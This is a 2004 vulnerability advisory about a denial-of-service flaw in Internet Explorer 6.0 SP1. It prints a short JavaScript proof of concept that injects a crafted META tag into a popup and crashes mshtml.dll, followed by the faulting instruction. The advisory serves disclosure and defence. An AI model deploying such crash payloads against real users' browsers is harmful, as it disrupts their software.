Reported May 17, 2004, by Mike Mauler
VERSIONS AFFECTED
|
DESCRIPTION
A vulnerability in IE 6.0 SP1 could result in a Denial of Service (DoS)
condition. By using a malformed HTML page containing JavaScript code with a
specially crafted META tag, a potential attacker could cause IE to terminate
with an access violation.
DEMONSTRATION
The discoverer posted the following code as proof of concept:
The following script code
will cause Internet Explorer to crash when trying to parse the META tag
contained within. The problem stems from a bug in the MSHTML library
(mshtml.dll). Below is the script code that causes the crash:
<scr!pt type="text/javascript">
Wnd = window.createPopup();
Wnd.document.body.innerHTML='<meta
http-equiv="imagetoolbar" content="no">';
</scr!pt>
The effect of the META tag is to cause an access violation within mshtml.dll,
however not exploitable. The problematic piece of code is shown below:
636D54AF 8B48
2C MOV ECX,
\[EAX+2C\]
EAX = 0, Bad read of address 0x0000002C
VENDOR RESPONSE
Microsoft hasn't
released a fix or bulletin that addresses this vulnerability.
CREDIT
Discovered by Mike Mauler.